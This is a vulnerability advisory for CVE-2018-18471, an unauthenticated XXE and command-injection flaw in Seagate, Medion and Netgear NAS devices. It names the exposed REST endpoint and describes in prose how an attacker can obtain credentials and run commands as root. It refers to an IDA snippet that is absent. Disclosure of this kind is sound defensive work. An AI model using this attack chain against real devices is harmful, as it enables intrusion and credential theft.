#VU15459 Privilege escalation in NETGEAR products - CVE-2018-18471

Cybersecurity Help s.r.o.

Published: 2018-10-22 | Updated: 2018-10-22

Vulnerability identifier: #VU15459

Vulnerability risk: High

CVSSv4.0: 8.1 [CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:N/SA:N/E:U/U:Amber]

CVE-ID: CVE-2018-18471

CWE-ID: CWE-77

Exploitation vector: Network

Exploit availability: No

Vulnerable software:
Seagate GoFlex Home
Hardware solutions / Firmware
Medion LifeCloud NAS
Hardware solutions / Office equipment, IP-phones, print servers
Netgear Stora
Hardware solutions / Office equipment, IP-phones, print servers

Vendor: Seagate
Medion
NETGEAR

Description
The vulnerability allows a remote attacker to compromise vulnerable system.

The weakness exists due to most of the API endpoints and the web interface were accessible without authentication while one of the endpoints in the REST API interface is located at /api/2.0/rest/aggregator/xml which loads xml data from POST data. A remote attacker cause the xml parser to make a request to the server at 192.168.56.1 for the file XXE_CHECK, get usernames and passwords,
cause the daemon to skip over junk data until it finds the string as shown in the IDA snippet below and inject arbitrary commands and execute arbitrary code with root privileges.

Mitigation
Cybersecurity Help is currently unaware of any solutions addressing the vulnerability.

Vulnerable software versions

Seagate GoFlex Home: All versions

Medion LifeCloud NAS: All versions

Netgear Stora: All versions

External links
https://www.wizcase.com/blog/hack-2018/

Q & A

Can this vulnerability be exploited remotely?

Yes. This vulnerability can be exploited by a remote non-authenticated attacker via the Internet.

Is there known malware, which exploits this vulnerability?

No. We are not aware of malware exploiting this vulnerability.

Latest bulletins with this vulnerability

Multiple vulnerabilities in NAS devices